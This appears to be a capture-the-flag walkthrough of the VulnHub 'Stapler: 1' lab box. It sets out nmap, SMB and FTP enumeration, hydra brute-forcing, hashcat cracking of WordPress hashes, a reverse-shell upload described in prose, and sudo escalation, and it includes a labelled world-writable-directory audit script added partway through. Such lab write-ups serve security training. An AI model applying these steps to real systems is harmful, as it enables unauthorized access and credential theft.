Stapler: 1 VulnHub walkthrough
This is a vulnerable box, and we will enumerate it step by step.
First, download the box from VulnHub using this link and deploy it in your local VirtualBox.
Scan with nmap to find the box's IP address.
Important: my PC's IP address changes during this walkthrough, so don't be confused.
$ nmap -sn 192.168.1.1/24

192.168.1.214 is the Stapler machine's IP, so let's enumerate it.
A simple full port scan with nmap:
$ nmap -v -p- 192.168.1.214

We see many services running on the Stapler box. Let's first enumerate port 80 and check what is running there.

Port 80 returns an error. Don't worry; let's run a default script and version scan with nmap:
$ sudo nmap -sC -sV -sT -sU -A -p 20,21,22,53,80,123,137,138,139,666,3306,12380 192.168.1.214

Let's check the FTP service with the anonymous username:
$ ftp 192.168.1.214

View the contents of the note file with cat:
$ cat note

The note appears to reference two users, Elly and John, and contains a message.
Let's enumerate port 139 (SMB) and check what data the SMB service exposes:
$ smbclient -L 192.168.1.214

We successfully listed the SMB shares without a username or password. Now let's see what data is available in the kathy and tmp shares.
$ smbclient //192.168.1.214/kathy

We successfully logged in anonymously to the kathy share and retrieved all of its data. We tried to upload a file to the kathy share, but we have no permission to put files or create directories there. Let's look at the data from the kathy share.
Now we use enum4linux to enumerate further:

$ enum4linux -a 192.168.43.166
We found some usernames.

Let's build a wordlist from these usernames.
First, clean up the username list with cut:
$ cat userall.txt | cut -d " " -f 3

$ cat myuser.txt | cut -d '\' -f 2

Let's try these users against FTP:

$ hydra -L userlist.txt -P userlist.txt ftp://192.168.43.166
We found a valid username and password. Let's log in with them.

Let's try the FTP credentials on the SSH service.
user : fin
password : SHayslett

We are logged in via SSH. Let's enumerate.

We found the MySQL password in the wp-config.php file.

Let's try connecting to MySQL:
$ mysql -h 192.168.43.166 -u root -p

We successfully logged in to MySQL.
MySQL [(none)]> show databases;

MySQL [(none)]> use wordpress

MySQL [wordpress]> show tables;

MySQL [wordpress]> SELECT * FROM wp_users;

Now we have the users' password hashes. Let's crack them with hashcat (mode 400 is phpass, the hash format WordPress uses):
$ hashcat -O -m 400 -a 0 -o hash_output.txt hash.txt /usr/share/wordlists/rockyou.txt
We can also use John the Ripper for password cracking, so let's try with john.

Now run john.

Now we try to get a www-data shell. First we look for a directory with 777 permissions:
$ find / -perm 777 -type d 2>/dev/null
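Added here as a defensive check, not a command from the original walkthrough: the find above matches only directories whose mode is exactly 0777, so an audit of a web root should test the others-write bit instead and skip sticky-bit directories such as /tmp. The /var/www path in the usage comment is an assumption.

```sh
#!/bin/sh
# Added example (not the author's command): audit a directory tree for
# world-writable directories. "find -perm 777" matches only mode 0777;
# "-perm -0002" matches any directory with the others-write bit set
# (0777, 0757, 0773 ...). Sticky-bit directories such as /tmp (mode 1777)
# are excluded, since users there cannot touch each other's files.

# Print world-writable, non-sticky directories below $1, one per line, sorted.
list_world_writable() {
    find "$1" -type d -perm -0002 ! -perm -1000 2>/dev/null | sort
}

# Print how many such directories exist below $1 (always prints a number).
count_world_writable() {
    list_world_writable "$1" | awk 'END { print NR }'
}

# Report offenders and return 1 if any exist, 0 if the tree is clean.
# Meant for a web root such as /var/www (assumed path, not from the box).
audit_world_writable() {
    offenders=$(list_world_writable "$1")
    if [ -n "$offenders" ]; then
        printf '%s\n' "$offenders" | sed 's/^/world-writable directory: /'
        return 1
    fi
    printf 'no world-writable directories below %s\n' "$1"
    return 0
}

# Usage: audit_world_writable /var/www
```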

Now upload our reverse shell to the uploads directory using wget.

Start a nc listener on your machine, then call the shell.

The blogblog directory hosts a WordPress site, but we want to execute our shell, so request it now.

We got a shell. Now enumerate as the www-data user.

First, convert this shell into an interactive shell using this link.
Privilege escalation
Let's enumerate as the www-data user.
Using find, we located the users' .bash_history files, which contain some useful information:
$ find -name .bash_history

$ cat ./JKanode/.bash_history

Now try the password found there for peter over SSH:
username : peter
password : JZQuyIN5
$ ssh peter@192.168.43.166

This is not a bash shell, so let's switch to bash:
red% /bin/bash

Running sudo -l shows that peter can run any command with sudo:
$ sudo -l

Now let's find the flag.

We got the flag.
Happy hacking :)